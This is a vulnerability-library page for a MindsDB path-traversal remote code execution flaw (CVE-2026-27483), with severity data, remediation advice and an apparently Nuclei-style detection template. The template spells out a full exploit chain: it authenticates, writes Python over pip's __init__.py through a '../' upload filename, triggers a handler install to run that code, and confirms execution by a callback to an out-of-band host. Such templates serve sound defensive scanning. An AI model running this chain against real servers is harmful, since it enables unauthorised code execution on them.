/Vulnerability Library

MindsDB - Remote Code Execution

CVE-2026-27483
Verified

Description

MindsDB < 25.9.1.1 contains a remote code execution caused by path traversal in the /api/files upload file module, letting authenticated attackers write arbitrary files and execute commands, exploit requires authentication.

Severity

High

CVSS Score

8.8

Exploit Probability

23%

Affected Product

MindsDB

Published Date

March 6, 2026

Template Author

thewhiteh4t

CVE-2026-27483.yaml
id: CVE-2026-27483

info:
  name: MindsDB - Remote Code Execution
  author: thewhiteh4t
  severity: high
  description: |
    MindsDB < 25.9.1.1 contains a remote code execution caused by path traversal in the /api/files upload file module, letting authenticated attackers write arbitrary files and execute commands, exploit requires authentication.
  impact: |
    Authenticated attackers can execute arbitrary commands remotely by writing files to arbitrary paths on the server.
  remediation: |
    Upgrade to version 25.9.1.1 or later.
  reference:
    - https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
    - https://github.com/mindsdb/mindsdb/commit/87a44bdb2b97f963e18f10a068e1a1e2690505ef
    - https://github.com/mindsdb/mindsdb/releases/tag/v25.9.1.1
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27483
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2026-27483
    epss-score: 0.23286
    epss-percentile: 0.96023
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 5
    vendor: MindsDB
    product: MindsDB
    shodan-query: http.title:"MindsDB"
  tags: cve,cve2026,mindsdb,path-traversal,rce,oast,intrusive,unauth

variables:
  token: ""
  username: ""
  password: ""
  filename: "{{randstr}}"

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/status"

    extractors:
      - type: regex
        name: mindsdb_version
        part: body
        group: 1
        regex:
          - '"mindsdb_version":\s*"([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)'
        internal: true

      - type: regex
        name: http_auth_enabled
        part: body
        group: 1
        regex:
          - '"http_auth_enabled":\s*(true|false)'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "mindsdb_version")'
          - 'compare_versions(mindsdb_version, ">= 25.4.1.0", "< 25.9.1.1")'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 && contains(body, "token")'
          - 'status_code == 400 && contains(body, "Error in username or password")'
        condition: or
        internal: true

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - '{"token":\s*"([^"]+)"'
        internal: true

  - raw:
      - |
        PUT /api/files/{{filename}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv9dZC0cAHLlHSHD9
        Authorization: Bearer {{token}}
        Connection: close

        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9
        Content-Disposition: form-data; name="name"

        {{filename}}
        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9
        Content-Disposition: form-data; name="source"

        {{filename}}
        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9
        Content-Disposition: form-data; name="source_type"

        file
        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9
        Content-Disposition: form-data; name="file"; filename="../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"
        Content-Type: text/plain

        import urllib.request
        urllib.request.urlopen('http://{{interactsh-url}}')
        ------WebKitFormBoundaryv9dZC0cAHLlHSHD9--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains(body, "Not supported format")'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/handlers/anomaly_detection/install HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains(body, "Failed to install dependencies")'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/api/status"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "mindsdb_version"

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a00473045022100e843ef163fd2fa0c03cf2e72d76487706e52be29499ac28a61cc37125fbb1241022057abb99f20ae91bdf98054fc969a5b1c7649430aea4469916d1803cda76076d6:922c64590222798bb761d5b6d8e72950
8.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-27483
CWE ID:
cwe-22

References

https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfqhttps://github.com/mindsdb/mindsdb/commit/87a44bdb2b97f963e18f10a068e1a1e2690505efhttps://github.com/mindsdb/mindsdb/releases/tag/v25.9.1.1https://nvd.nist.gov/vuln/detail/CVE-2026-27483

Remediation Steps

Upgrade to version 25.9.1.1 or later.